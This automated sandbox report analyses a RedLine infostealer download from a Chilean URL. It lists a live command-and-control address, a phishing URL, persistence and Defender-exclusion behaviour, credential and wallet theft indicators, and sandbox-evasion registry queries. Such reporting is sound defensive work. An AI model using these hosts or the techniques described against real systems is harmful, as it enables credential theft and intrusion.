redline | hxxps://download[.]tglobal[.]cl/

Analysis

max time kernel
428s
max time network
405s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-06-2024 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://download.tglobal.cl/

Score

10^/10

redline n1 discovery execution infostealer motw persistence phishing spyware stealer

Malware Config

Extracted

Family

redline

Botnet

45.89.53.206:4663

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4136-949-0x00000000011A0000-0x00000000011F2000-memory.dmp	family_redline
behavioral2/memory/2688-1566-0x0000000007170000-0x00000000071C2000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

Blind.pif

description	pid	process	target process
PID 2992 created 3384	2992	Blind.pif	Explorer.EXE
PID 2992 created 3384	2992	Blind.pif	Explorer.EXE
PID 2992 created 3384	2992	Blind.pif	Explorer.EXE

Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exepowershell.exe

flow pid process

53 4700 msiexec.exe
55 4700 msiexec.exe
71 2688 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

396 powershell.exe
2688 powershell.exe
4892 powershell.exe

flow	pid	process
53	4700	msiexec.exe
55	4700	msiexec.exe
71	2688	powershell.exe

pid	process
396	powershell.exe
2688	powershell.exe
4892	powershell.exe

Executes dropped EXE 17 IoCs

Processes:

Setup.exeBlind.pifRegAsm.exeRegAsm.exeRegAsm.exeComputerDefaults.exepython_x86_Lib.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeRmmService.exeRmmService.exeITSMAgent.exeITSMAgent.exeMusicPlayerApp.exeMusicPlayerApp.exe

pid	process
1460	Setup.exe
2992	Blind.pif
3400	RegAsm.exe
3564	RegAsm.exe
4136	RegAsm.exe
4392	ComputerDefaults.exe
1104	python_x86_Lib.exe
4216	ITSMService.exe
2516	ITSMAgent.exe
2896	ITSMAgent.exe
2948	ITSMAgent.exe
1388	RmmService.exe
4560	RmmService.exe
3432	ITSMAgent.exe
2800	ITSMAgent.exe
404	MusicPlayerApp.exe
4716	MusicPlayerApp.exe

Loads dropped DLL 64 IoCs

Processes:

MsiExec.exeMsiExec.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeRmmService.exe

pid	process
2476	MsiExec.exe
2476	MsiExec.exe
2476	MsiExec.exe
2476	MsiExec.exe
2904	MsiExec.exe
2904	MsiExec.exe
2904	MsiExec.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
4216	ITSMService.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2896	ITSMAgent.exe
2896	ITSMAgent.exe
2896	ITSMAgent.exe
2896	ITSMAgent.exe
2896	ITSMAgent.exe
2896	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2896	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2516	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2948	ITSMAgent.exe
2904	MsiExec.exe
1388	RmmService.exe
1388	RmmService.exe
1388	RmmService.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\ITarian\\Endpoint Manager\\ITSMAgent.exe"	msiexec.exe

Checks for any installed AV software in registry 1 TTPs 8 IoCs

Security Software Discovery

T1518.001

Processes:

ITSMService.exe

description	ioc	process
Delete value	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\RemovalSecurity	ITSMService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\RemovalSecurity	ITSMService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	ITSMService.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	ITSMService.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\	ITSMService.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exeMusicPlayerApp.exeMusicPlayerApp.exe

description	ioc	process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\K:	MusicPlayerApp.exe
File opened (read-only)	\??\U:	MusicPlayerApp.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	MusicPlayerApp.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	MusicPlayerApp.exe
File opened (read-only)	\??\T:	MusicPlayerApp.exe
File opened (read-only)	\??\O:	MusicPlayerApp.exe
File opened (read-only)	\??\Q:	MusicPlayerApp.exe
File opened (read-only)	\??\V:	MusicPlayerApp.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	MusicPlayerApp.exe
File opened (read-only)	\??\G:	MusicPlayerApp.exe
File opened (read-only)	\??\K:	MusicPlayerApp.exe
File opened (read-only)	\??\L:	MusicPlayerApp.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\E:	MusicPlayerApp.exe
File opened (read-only)	\??\H:	MusicPlayerApp.exe
File opened (read-only)	\??\J:	MusicPlayerApp.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	MusicPlayerApp.exe
File opened (read-only)	\??\S:	MusicPlayerApp.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	MusicPlayerApp.exe
File opened (read-only)	\??\P:	MusicPlayerApp.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	MusicPlayerApp.exe
File opened (read-only)	\??\X:	MusicPlayerApp.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\I:	MusicPlayerApp.exe
File opened (read-only)	\??\R:	MusicPlayerApp.exe
File opened (read-only)	\??\W:	MusicPlayerApp.exe
File opened (read-only)	\??\Y:	MusicPlayerApp.exe
File opened (read-only)	\??\B:	MusicPlayerApp.exe
File opened (read-only)	\??\Y:	MusicPlayerApp.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	MusicPlayerApp.exe
File opened (read-only)	\??\P:	MusicPlayerApp.exe
File opened (read-only)	\??\R:	MusicPlayerApp.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\N:	MusicPlayerApp.exe

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
phishing motw

Processes:

flow ioc

3 https://ertytvm.xyz/?FCmkiNRLh0Y2BHeutdTwaKGo54Mfs6-xIzrmYvfqdQhHKX4B1CPNVREiawejpUG3Lo7WMuF9A8c-Mf62jtxdLuv8WekyJqrXRI

flow	ioc
3	https://ertytvm.xyz/?FCmkiNRLh0Y2BHeutdTwaKGo54Mfs6-xIzrmYvfqdQhHKX4B1CPNVREiawejpUG3Lo7WMuF9A8c-Mf62jtxdLuv8WekyJqrXRI

Drops file in System32 directory 6 IoCs

Processes:

ITSMService.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416	ITSMService.exe

Drops file in Program Files directory 64 IoCs

Processes:

python_x86_Lib.exemsiexec.exeITSMService.exe

description	ioc	process
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\sq.msg	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\demos\samples\EFileDlg.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\idlelib\HyperParser.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\__main__.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\filters\optionaltags.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\es_do.msg	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Metlakatla	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Phoenix	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\xml\dom\pulldom.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\ptcp154.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\gyp-0.1-py2.7.egg\gyp\MSVSNew.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\setuptools\archive_util.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\setuptools\script.tmpl	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Fortaleza	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Thimbu	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Tahiti	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\hello	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Qt5Core.dll	msiexec.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\rfc822.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\compat\dictconfig.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\fr.msg	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\wave.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\ipaddress.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\setuptools\command\rotate.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\bitmaps\info.gif	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\bitmaps\textfile.xpm	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\multiprocessing\connection.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\multiprocessing\dummy\__init__.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\menubu.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\iso8859_7.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Australia\Adelaide	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\San_Marino	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\DLLs\pyexpat.pyd	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\email\mime\audio.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Antarctica\Casey	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\images\pattern.xbm	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\xdrlib.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Porto-Novo	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Kentucky\Monticello	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\iso8859-2.enc	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\iso8859-4.enc	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\kw_gb.msg	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Nipigon	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8\8.4\platform	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\rmmlogs\Rmm_Proxy_dll.log.5	ITSMService.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\logging\config.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\vcs\subversion.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\cp850.enc	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Jujuy	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Israel	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\images	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\reg1.2	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\virtualprinter\RCVirtualPrintDriverRenderFilter_x64-PipelineConfig.xml	msiexec.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\utf_32.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\MST7MDT	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\raw_unicode_escape.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Luanda	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\iso8859_14.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\iso8859-14.enc	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Glace_Bay	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\DirList.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\xml\dom\minicompat.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\iso8859-2.enc	python_x86_Lib.exe

Drops file in Windows directory 19 IoCs

Processes:

msiexec.exeMsiExec.exe

description	ioc	process
File created	C:\Windows\Installer\SourceHash{CA6B5E30-616B-4A5E-BC20-52629865CC0A}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC7F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI15C9.tmp	msiexec.exe
File created	C:\Windows\Installer\e5c04bc.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI73B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI807.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\icon.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC01.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI154B.tmp	msiexec.exe
File created	C:\Windows\Installer\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\icon.ico	msiexec.exe
File created	C:\Windows\Installer\e5c04ba.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5c04ba.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9DD.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2990.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{CA6B5E30-616B-4A5E-BC20-52629865CC0A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\Installer\MSI48D1.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
